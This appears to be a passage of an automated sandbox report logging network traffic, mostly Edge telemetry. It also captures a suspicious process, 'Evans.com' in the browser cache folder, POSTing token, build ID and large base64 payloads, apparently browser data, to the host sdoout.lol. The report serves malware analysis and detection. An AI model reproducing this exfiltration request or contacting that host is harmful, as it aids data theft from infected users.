                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:34 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:35 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    30192.168.2.55008120.110.205.1194436308C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:34 UTC1175OUTGET /c.gif?rnd=1735634793756&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=dc137b0ec0ad4d94aa04f3e0c0cf6381&activityId=dc137b0ec0ad4d94aa04f3e0c0cf6381&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Host: c.msn.com
                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                    Cookie: _C_ETH=1; USRLOC=; MUID=05F9EFDB33DC678B1BFFFABD3256667F; _EDGE_S=F=1&SID=1CCB54C755F762B91E6041A1542B63D6; _EDGE_V=1
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:35 UTC1108INHTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                                                                    Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                    Location: https://c.bing.com/c.gif?rnd=1735634793756&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=dc137b0ec0ad4d94aa04f3e0c0cf6381&activityId=dc137b0ec0ad4d94aa04f3e0c0cf6381&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=A917510D236B4283B5F86A7AAE2621DD&RedC=c.msn.com&MXFR=05F9EFDB33DC678B1BFFFABD3256667F
                                                                                                                                                                                                                                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                    P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                                                                    Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                                                    Set-Cookie: MUID=05F9EFDB33DC678B1BFFFABD3256667F; domain=.msn.com; expires=Sun, 25-Jan-2026 08:46:35 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:34 GMT
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    Content-Length: 0


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    31192.168.2.550083108.139.47.924436308C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:34 UTC925OUTGET /b?rn=1735634793756&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=05F9EFDB33DC678B1BFFFABD3256667F&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:35 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:35 GMT
                                                                                                                                                                                                                                                                                                                                    Location: /b2?rn=1735634793756&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=05F9EFDB33DC678B1BFFFABD3256667F&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                                                                    set-cookie: UID=137e5d88de79f0ec687e6aa1735634795; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                                                    set-cookie: XID=137e5d88de79f0ec687e6aa1735634795; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                                                                    Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                    Via: 1.1 aea539314dea6e591d10d79d61e42090.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: JFK50-P1
                                                                                                                                                                                                                                                                                                                                    X-Amz-Cf-Id: w35KWB6wA-6GuWYxBmwAXmpND3XYsMkMXi9k8atrcmUq5GVDtXmr5w==


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    32192.168.2.55008213.69.239.774436308C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:35 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735634793754&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                    Content-Length: 3869
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                    Cookie: _C_ETH=1; USRLOC=; MUID=05F9EFDB33DC678B1BFFFABD3256667F; _EDGE_S=F=1&SID=1CCB54C755F762B91E6041A1542B63D6; _EDGE_V=1
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:35 UTC3869OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 33 31 54 30 38 3a 34 36 3a 33 33 2e 37 34 38 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 31 35 34 37 65 32 30 2d 63 38 36 36 2d 34 37 34 32 2d 61 62 34 62 2d 61 33 30 38 30 30 34 61 61 37 39 33 22 2c 22 65 70 6f 63 68 22 3a 22 32 38 34 33 39 34 33 34 38 34 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-31T08:46:33.748Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"f1547e20-c866-4742-ab4b-a308004aa793","epoch":"2843943484"},"app":{"locale
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:35 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=d07914297c3f43b59052ed08b87b2a2b&HASH=d079&LV=202412&V=4&LU=1735634795344; Domain=.microsoft.com; Expires=Wed, 31 Dec 2025 08:46:35 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=6abe557fe29247b6942425b281e6595f; Domain=.microsoft.com; Expires=Tue, 31 Dec 2024 09:16:35 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                    time-delta-millis: 1590
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:35 GMT
                                                                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    33192.168.2.550094108.139.47.924436308C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:35 UTC1012OUTGET /b2?rn=1735634793756&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=05F9EFDB33DC678B1BFFFABD3256667F&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                    Cookie: UID=137e5d88de79f0ec687e6aa1735634795; XID=137e5d88de79f0ec687e6aa1735634795
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:35 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:35 GMT
                                                                                                                                                                                                                                                                                                                                    Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                    Via: 1.1 e82b8f8953c90f58ae3b2feee6b64b70.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: JFK50-P1
                                                                                                                                                                                                                                                                                                                                    X-Amz-Cf-Id: LgItUE9BNJZVDsXaxkvtMUpgjKakR238zi8p9fQ1sm4wHtUGY_NZ7g==


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    34192.168.2.550096116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:35 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----l6pp8gdtjm79zmoh4wlx
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Content-Length: 393697
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:35 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 6c 36 70 70 38 67 64 74 6a 6d 37 39 7a 6d 6f 68 34 77 6c 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 6c 36 70 70 38 67 64 74 6a 6d 37 39 7a 6d 6f 68 34 77 6c 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 6c 36 70 70 38 67 64 74 6a 6d 37 39 7a 6d 6f 68 34 77 6c 78 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ------l6pp8gdtjm79zmoh4wlxContent-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------l6pp8gdtjm79zmoh4wlxContent-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------l6pp8gdtjm79zmoh4wlxCont
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
